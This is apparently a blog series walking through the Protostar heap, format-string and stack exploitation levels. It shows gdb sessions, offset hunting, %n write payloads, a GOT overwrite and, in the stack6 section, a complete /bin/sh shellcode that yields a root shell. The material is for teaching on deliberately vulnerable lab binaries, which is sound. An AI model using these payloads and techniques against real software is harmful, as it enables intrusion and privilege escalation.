Exploit Exercises — Protostar Heap 2

There are a few interesting things here. The first one is in this code:

if(strlen(line + 5) < 31) {
    strcpy(auth->name, line + 5);
}

We see that the length of line parameter is checked. That means we cannot just overflow auth->name.

The second one is in this code:

auth = malloc(sizeof(auth));

When malloc() reserves space, it uses sizeof(auth). However auth is a pointer. Thus, it uses a size of an address of the structure instead of the structure itself. It should be sizeof(struct auth).

You can make sure, that the addresses increased by 0x10 each time we allocate new memory by calling auth:

auth a
[ auth = 0x804c008, service = (nil) ]
auth a
[ auth = 0x804c018, service = (nil) ]

0x10 is a space needed for:

To undersrand how an allocated memory looks, just use this picture:

We see the program uses strdup(), which allocates a copy of a char* on the heap. In other words it uses malloc() in its internals. So we can use this function to allocate additional heap memory.

We need to construct a pseudo heap chunk as if it was 32 bytes allocated. Don’t forget to take into account a size of chunk header used by strdup(). Then we need to write a variable right after it.

A little explanation to what is going to happen. We need our memory to look like this after execution:

auth chunk header [8]
-------------------------- chunk header --------------------------
auth chunk data [4]
padding to be aligned  [4] /* remember that 0x10  */
---- end of auth ----
service chunk header [8]
service chunk data [16]    /* 16 is a calculated value */
------------------------ 32 bytes of data ------------------------
auth [4]

Construct and run the exploit:

$ python -c "print 'auth a'+'\n'+'service'+'A'*16+'\xff'+'\n'+'login'" | ./heap2
[ auth = (nil), service = (nil) ]
[ auth = 0x804c008, service = (nil) ]
[ auth = 0x804c008, service = 0x804c018 ]
you have logged in already!
[ auth = 0x804c008, service = 0x804c018 ]

Exploit Exercises — Protostar Heap 1

This level is different. Finding a vulnerability in the code is easy:

strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);

There are no buffer length checks. We can crash our program like this:

$ ./heap1 `python -c "print 'A'*30"` aaa
Segmentation fault

But when you use smaller input, it runs without any errors:

$ ./heap1 `python -c "print 'A'*20"` aaa
and that's a wrap folks!

Why is this hapenning? I started gdb and overflowed the input by 1 byte:

(gdb) r `python -c "print 'A'*21"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*21"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8040041 <Address 0x8040041 out of bounds>, src=0xbffff899 "aaa")
    at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c

I noticed that there is 0x41 byte inside strcpy() function. That looked strange, so I run the program again, but I overflowed it with 2 bytes this time:

(gdb) r `python -c "print 'A'*22"` aaa
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*22"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x8004141 <Address 0x8004141 out of bounds>, src=0xbffff899 "aaa")
    at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c

Certainly, we are rewriting the address of a buffer in strcpy(). Since the second parameter passed to the function is aaa, it means that we are in the second strcpy() function.

At this moment I realized how I can exploit this app. As we control which address is getting rewriten by the second strcpy() writes, we can rewrite it by the return address from the stack. For example, the second strcpy() can write the second input parameter into it. As a result, we can change the program flow.

Let’s examine the stack after the crash:

(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffff899 "aaa")
    at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c
(gdb) x/2x $esp
0xbffff640:    0x00000000    0x00000000
(gdb) x/20x $esp
0xbffff640:    0x00000000    0x00000000    0xbffff678    0x0804855a
0xbffff650:    0x41414141    0xbffff899    0x08048580    0xbffff678
0xbffff660:    0xb7ec6365    0x0804a008    0x0804a028    0xb7fd7ff4
0xbffff670:    0x08048580    0x00000000    0xbffff6f8    0xb7eadc76
0xbffff680:    0x00000003    0xbffff724    0xbffff734    0xb7fe1848

0x41414141 is the address of a buffer for strcpy(). There’s 0xbffff899 after it, it’s an address of aaa string (we can see it from the error). Before 0x41414141 there are two addresses. Probably it’s saved eip and ebp registers. Let’s look at registers:

(gdb) info registers
...
esp            0xbffff640    0xbffff640
ebp            0xbffff648    0xbffff648
...
eip            0xb7f09df4    0xb7f09df4 <*__GI_strcpy+20>
...

Our assumption is correct.

So we need to rewrite the address i2->name by the address of the return address on the stack. We start rewriting after 20 byte and we know the address of the return address on the stack is 2 words ahead, so it is 0xbffff640 + 3*4 = 0xbffff64c. Let’s try to rewrite i2->name, run gdb and set breakpoint on the second strcpy() call:

(gdb) b* 0x08048555
Breakpoint 1 at 0x8048555: file heap1/heap1.c, line 32.
(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` CCCC

Breakpoint 1, 0x08048555 in main (argc=3, argv=0xbffff724) at heap1/heap1.c:32
32    in heap1/heap1.c

If we look at our stack, we can see that it was successfully rewritten by 0x43434343 (see the value on 0xbffff64c memory address):

(gdb) s
...
(gdb) s
...
(gdb) x/24x $esp-12
0xbffff634:    0xb7ff6210    0xbffff87b    0xb7f09de0    0x00000000
0xbffff644:    0x00000000    0xbffff678    0x43434343    0xbffff64c
0xbffff654:    0xbffff894    0x08048580    0xbffff678    0xb7ec6365
0xbffff664:    0x0804a008    0x0804a028    0xb7fd7ff4    0x08048580
0xbffff674:    0x00000000    0xbffff6f8    0xb7eadc76    0x00000003
0xbffff684:    0xbffff724    0xbffff734    0xb7fe1848    0xbffff6e0

Now we need to replace the second parameter with the address of winner() function. We can get the address of the function using readelf:

$ readelf -Ws heap1 | grep winner
    55: 08048494    37 FUNC    GLOBAL DEFAULT   14 winner

Or from gdb:

(gdb) print winner
$1 = {void (void)} 0x8048494 <winner>

Now we can run out exploit:

(gdb) r `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x4c\xf6\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484241540

Program received signal SIGILL, Illegal instruction.
0xbffff602 in ?? ()

If we run it from console only, it won’t work because of environment variables. Let’s find the correct address:

(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r `python -c "print 'A'*30"` aaa
Starting program: /opt/protostar/bin/heap1 `python -c "print 'A'*30"` aaa

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x41414141 <Address 0x41414141 out of bounds>, src=0xbffffdb0 "aaa") at strcpy.c:40
40    strcpy.c: No such file or directory.
    in strcpy.c
(gdb) x/8x $esp
0xbffffb60:    0x00000000    0x00000000    0xbffffb98    0x0804855a
0xbffffb70:    0x41414141    0xbffffdb0    0x08048580    0xbffffb98

Calculate the offset like before 0xbffffb60 + 12 = 0x0xbffffb6c and run exploit in console:

$ /opt/protostar/bin/heap1 `python -c "print 'A'*20 + '\x6c\xfb\xff\xbf'"` `python -c "print '\x94\x84\x04\x08'"`
and we have a winner @ 1484242022
Segmentation fault

Exploit Exercises — Protostar Heap 0

This level is a lot like classical stack overflows.

Let’s crash the app first:

(gdb) r `python -c "print 'A'*1000"`
Starting program: /opt/protostar/bin/heap0 `python -c "print 'A'*1000"`
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Now let’s find the offset using patterns from msfconsole. Generate a pattern using this command:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Then run the program with the pattern as input:

(gdb) r Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Starting program: /opt/protostar/bin/heap0 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

Then search for 0x41346341 in the pattern:

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x41346341
[*] Exact match at offset 72

The output above means that we need to rewrite 72 bytes before reaching eip.

Now we need to find the address of winner():

$ readelf -s heap0
...
    55: 08048464    20 FUNC    GLOBAL DEFAULT   14 winner

Now let’s use this address in the exploit:

$ ./heap0 `python -c "print 'A'*72 + '\x64\x84\x04\x08'"`
data is at 0x804a008, fp is at 0x804a050
level passed

Exploit Exercises — Protostar Format Levels

This is a protostar walkthrough describing format string exploitation.

This article is the only thing you need to complete these levels.

Format 0

$ ./format0 %64d`python -c 'print "\xef\xbe\xad\xde"'`
you have hit the target correctly :)

When we use %64d , sprintf pops 64 bytes from the stack and then adds 0xdeadbeef and copies it into buffer causing overflow.

Format 1

Read this first to understand how different variables are stored. Then we look for target:

$ objdump -t format1 | grep target
08049638 g     O .bss   00000004              target

We see the needed variable is in uninitialized data segment called .bss and has the address 0x08049638.

Then I tried to print 146 bytes from the stack and tried to find where our buffer is stored:

$ ./format1 ABCD`python -c 'print "%x."*146'`

ABCD804960c.bffff508.8048469.b7fd8304.b7fd7ff4.bffff508.8048435.bffff708.b7ff1040.804845b.b7fd7ff4.8048450.0.bffff588.b7eadc76.2.bffff5b4.bffff5c0.b7fe1848.bffff570.ffffffff.b7ffeff4.804824d.1.bffff570.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.0.0.bffff588.a003ccb4.8a519aa4.0.0.0.2.8048340.0.b7ff6210.b7eadb9b.b7ffeff4.2.8048340.0.8048361.804841c.2.bffff5b4.8048450.8048440.b7ff1040.bffff5ac.b7fff8f8.2.bffff6fe.bffff708.0.bffff8c3.bffff8d8.bffff8ef.bffff907.bffff915.bffff929.bffff94c.bffff963.bffff976.bffff980.bffffe70.bffffe89.bffffec7.bffffedb.bffffef9.bfffff10.bfffff21.bfffff3c.bfffff44.bfffff54.bfffff61.bfffff97.bfffffac.bfffffc0.bfffffd4.bfffffe6.0.20.b7fe2414.21.b7fe2000.10.78bfbbf.6.1000.11.64.3.8048034.4.20.5.7.7.b7fe3000.8.0.9.8048340.b.3e9.c.0.d.3e9.e.3e9.17.1.19.bffff6db.1f.bffffff2.f.bffff6eb.0.0.0.0.0.50000000.f6e2fdf8.67e5aff4.14e8ba4e.6901a7c9.363836.0.0.0.2f2e0000.6d726f66.317461.44434241.252e7825.78252e78.2e78252e.252e7825.

Can you see that 0x44434241 value in the end? Also you can use some bruteforce:

$ for i in {1..1000}; do echo -n "$i ";./format1 "ABCD%$i\$x" | grep 44434241; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
141
142 ABCD44434241

%4$x is what called “direct access”.

You can see ABCD above (don’t forget we are on little-endian machine). Now we know the offset and we can try to directly access this variable:

./format1 ABCD`python -c 'print "%142$x"'`
ABCD44434241u

Now we know the offset in the stack in printf and we can rewrite the value using %n. Read more about using %n here. In a nutshell, using %n you must specify address of int variable where the size of written data will be written to.

So if you use something like <addr>%141%n it will pop addr from the stack and will write the number of written bytes there.

We know the address is 0x08049638 that in little-endian format is \x38\x96\x04\x08. Now we can simply replace ABCD with the address:

$ ./format1 `python -c 'print "\x38\x96\x04\x08"+"%142$n"'`
8�you have modified the target :)

Format 2

Now we are supposed to rewrite the variable with a particular value 64.

Now let’s do a bit of bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(

Now we need to find the address of target variable:

$ objdump -t format2 | grep target
080496e4 g     O .bss   00000004              target

Let’s try to rewrite to rewrite the variable with uncertain value:

$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(

We write 4 bytes and it says about it. If we want to write more, we just need to increase the number of bytes written. In this case the program will get 64 bytes before %4$n and then it replaces %4$n with the number of bytes it has already written:

$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)

Format 3

We start this challenge with bruteforcing to find the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(

Now we need to find the memory address of target:

$ objdump -t format3 | grep target
080496f4 g     O .bss   00000004              target

So let’s try to rewrite target:

$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(

Awesome! It says we rewrote 4 bytes.

Then I tried to extend the string and look and the stack:

$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(

Now let’s try to directly take 12th and then look at values on the stack:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(

To be clearer let’s draw simple scheme of our stack:

junk              <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08  <- 12th value
BBBB              <- 13th value
CCCC              <- 15th value
DDDD              <- 16th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saver ret>

I understand that it could be confusing. Because here numbers don’t have nothing with how the stack grows. They are just argument numbers. If so try to read about direct access in this paper.

Now everything is clear: we need to replace BBBB, CCCC, DDDD with address + i to rewrite each byte and add needed offsets in order to write the right value.

Let’s try to rewrite the lowest byte first. It must be 0x44:

$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD                                                   0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(

Then I tried to rewrite the third bite:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0
target is 00004444 :(

Awesome, it works. I didn’t know it keeps the number of already written bytes. So it’s easier to write small values first. We need to get 0x01025544, but we certainly cannot get 0x01 and 0x02. However we can try to write 0x101 for example. We will write in this order: 0x44, 0x55, 0x101, 0x102 (or maybe 0x202).

0x55 is a third byte, so we need increase our address just by 1:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD                                                   0       3221222592
target is 00005544 :(

Instead of writing 0x101 and 0x102 we can try to write 0x102 as two byte value:

$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD                                                   0       3221222592                                                                                                                                                                   3086843892
you have modified the target :)

Wow, we modified the target :)

Format 4

Now we need to redirect the flow. In order to do so we can just rewrite the return address.

As always we start with finding the offset:

$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141

Now let’s find the address of hello() function:

$ objdump -t format4 | grep hello
080484b4 g     F .text  0000001e              hello

From this point I understood that we are not supposed to rewrite the return address and we need to change the relocation table.

Let’s look at relocations:

$ objdump -TR format4

format4:     file format elf32-i386

DYNAMIC SYMBOL TABLE:
00000000  w   D  *UND*  00000000              __gmon_start__
00000000      DF *UND*  00000000  GLIBC_2.0   fgets
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main
00000000      DF *UND*  00000000  GLIBC_2.0   _exit
00000000      DF *UND*  00000000  GLIBC_2.0   printf
00000000      DF *UND*  00000000  GLIBC_2.0   puts
00000000      DF *UND*  00000000  GLIBC_2.0   exit
080485ec g    DO .rodata    00000004  Base        _IO_stdin_used
08049730 g    DO .bss   00000004  GLIBC_2.0   stdin


DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE
080496fc R_386_GLOB_DAT    __gmon_start__
08049730 R_386_COPY        stdin
0804970c R_386_JUMP_SLOT   __gmon_start__
08049710 R_386_JUMP_SLOT   fgets
08049714 R_386_JUMP_SLOT   __libc_start_main
08049718 R_386_JUMP_SLOT   _exit
0804971c R_386_JUMP_SLOT   printf
08049720 R_386_JUMP_SLOT   puts
08049724 R_386_JUMP_SLOT   exit

Additionally to look at the relocation table you can use:

$ readelf -r format4

Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
080496fc  00000106 R_386_GLOB_DAT    00000000   __gmon_start__
08049730  00000905 R_386_COPY        08049730   stdin

Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804970c  00000107 R_386_JUMP_SLOT   00000000   __gmon_start__
08049710  00000207 R_386_JUMP_SLOT   00000000   fgets
08049714  00000307 R_386_JUMP_SLOT   00000000   __libc_start_main
08049718  00000407 R_386_JUMP_SLOT   00000000   _exit
0804971c  00000507 R_386_JUMP_SLOT   00000000   printf
08049720  00000607 R_386_JUMP_SLOT   00000000   puts
08049724  00000707 R_386_JUMP_SLOT   00000000   exit

Good articles about shared libraries and relocations:

I thought it’s a good idea to try to rewrite exit() function by the address of hello() function. Thus we need to rewrite value at the address0x08049724 by 0x080484b4.

Now let’s use a test exploit:

$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt

$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()

Awesome. We rewrote the first two bytes and jumped to 0x000084b4. Let’s do the same with other two bytes. Do not forget to correct the offsets (-4 to the first one because we added new 4 bytes address).

Now run the exploit:

$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win

Exploit Exercises — Protostar Stack 6

We can see the binary uses a function __builtin_return_address() . This function returns the return address of the current function. Read more about it here.

The program looks almost like stack5 with a small difference:

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

If the return address starts with 0xff of 0xbf the program stops. Check the result of & operation using python:

$ python -c "print hex(0xffffffff & 0xbf000000)"
0xbf000000
$ python -c "print hex(0xbfffffff & 0xbf000000)"
0xbf000000

If we run gdb and look at registers after execution of the program we see that 0xbf****** is simply stack addresses:

(gdb) b main
Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27.
(gdb) run
Starting program: /opt/protostar/bin/stack6
...
(gdb) info registers
...
esp            0xbffff690    0xbffff690
ebp            0xbffff698    0xbffff698
...

That means that if the return address points to the stack, the program exits. That’s why we were told to use ret2libc or ROP. I have an article on this topic I will about it some time later. Actually, they didn’t mention one more way - jmp esp technique. In this case, the return address (address of the gadget jmp esp) will not be on the stack, it can be found anywhere, even in a shared library. Actually it semi-ROP technique and it’s pretty easy to do, so this is how I did this task.

To be a bit clearer I need to explain how it works.

Every function has an epilogue and a prologue. An epilogue looks like this:

push  ebp
mov   ebp, esp

It saves old ebp and moves epb “closer” to esp (equal actually) so that a new function had a new stack base address.

A prologue looks like this:

mov    esp, ebp
pop    ebp
ret

It cleares local variables (vis mov esp, ebp) and restores ebp. When our program runs ret instruction it already has esp register restored. It will point to the return address on the stack. After ret is executed, esp register is reduced by 4 bytes (the size of the address in 32-bit system). So if our exploit looks like JUNK + RET + SHELLCODE, esp will point to the shellcode.

Now we need to find jmp esp gadget. I’ll be using peda as it more informative than standard gdb and has some other features.

I copied the executable file to my local machine to find offsets:

$ scp user@<ip>:/opt/protostar/bin/stack6 ./

From the command below we know that our stack has no NX bit set:

$ scanelf -e stack6
 TYPE   STK/REL/PTL FILE
ET_EXEC **RWX** --- RW- stack6

Additionally, you can install and run exectack program:

$ sudo apt install execstack
$ execstack stack6
X stack6

That means that we can execute code from the stack.

Now we run gdb and look for gadgets:

$ gdb stack6
...
gdb-peda$ dumprop
Warning: this can be very slow, do not run for large memory range
Writing ROP gadgets to file: stack6-rop.txt ...
0x80484f9: ret
0x804835e: leave; ret
0x80484f7: dec ecx; ret
0x8048453: pop ebp; ret
0x8048480: ror cl,1; ret
0x8048512: in eax,0x5d; ret
0x804857b: sbb al,0x24; ret
0x804857a: mov ebx,[esp]; ret
...
0x80484f4: enter 0xfffe,0xff; leave; ret
0x8048576: pop esi; pop edi; pop ebp; ret
--More--(25/85)

We see that there is no jmp esp gadget, but the first one is ret, and it looks promising. It is not on the stack and it will jump to the next address on the stack. If you use it, then our exploit should look like JUNK + ADDR_OF_GADGET + ADDR_OF_SHELLCODE + SHELLCODE.

The address of the gadget ret is 0x80484f9

Now we find offset before eip like we did for stack5:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
$ echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag" > /tmp/exploit.txt
$ gdb stack6
...
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack6 < /tmp/exploit.txt
input path please: got path Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0A6Ac72Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Program received signal SIGSEGV, Segmentation fault.
**0x37634136** in ?? ()
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q **0x37634136**
[*] Exact match at offset **80**

So we need to rewrite 80 bytes. Now we can create our shellcode:

python -c "print 'A'*80 + '\xf9\x84\x04\x08' + 'AAAA' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

Addresses in debugger might distiguish beacuse of environment variables. So we need to unset unneeded variables and run the program:

(gdb) show env
LINES=42
COLUMNS=71
(gdb) unset env LINES
(gdb) unset env COLUMNS
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/stack6 < /tmp/exploit.txt
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��AAAA1�1۰̀Sh/ttyh/dev��1�f�'�̀1�Ph//shh/bin��PS�ᙰ


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/1x $esp
0xbffffbe4:    0xdb31c031

So the shellcode is at 0xbffffbe4. Repalce AAAA with this address. Don’t forget we are on little-endian machine:

python -c "print 'A'*80 + '\xf9\x84\x04\x08' + '\xe4\xfb\xff\xbf' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'" > /tmp/exploit.txt

Run program with exploit.txt as input and get root:

$ /opt/protostar/bin/stack6 < /tmp/exploit.txt
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA������1�1۰̀Sh/ttyh/dev��1�f�'�̀1�Ph//shh/bin��PS�ᙰ

# id
uid=1001(user) gid=1001(user) euid=0(root) groups=0(root),1001(user)

Also you can run exploit like this:

(python -c "print 'A'*80 + '\xf9\x84\x04\x08' + '\xe4\xfb\xff\xbf' + '\x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80'"; cat;) | /opt/protostar/bin/stack6

Exploit Exercises — Protostar Stack 5

The first four levels of protostar were pretty straightforward and real bufferoverflows starts with the 5th. This is a description of how I completed it.

We have the following code:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}

It creates a buffer and reads into it using gets. There’s a buffer overflow vulnerability here, because boundaries are not checked during reading into buffer.

We begin exploitation by finding an offset to eip. I used a script that generates a unique string, which we then pass to the executable:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag

Now we generate a simple pattern.txt file, containing generated pattern:

$ echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag" > /tmp/pattern.txt

Then we run stack5 in gdb and use pattern.txt as input:

$ gdb stack5
...
(gdb) r < /tmp/pattern.txt
Starting program: /opt/protostar/bin/stack5 < /tmp/pattern.txt

Program received signal SIGSEGV, Segmentation fault.
0x63413563 in ?? ()

It should segfault at 0x63413563. Now we search for these bytes in the pattern:

# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x63413563
[*] Exact match at offset 76

The output above means that we need to rewrite 76 bytes before rewriting eip.

Now we generate our test exploit, which looks like JUNK + RET + NOPS + SHELLCODE:

$ python -c "print 'A'*76 + 'BBBB' + '\x90'*10 + 'SHELLCODE'" > /tmp/exploit.txt

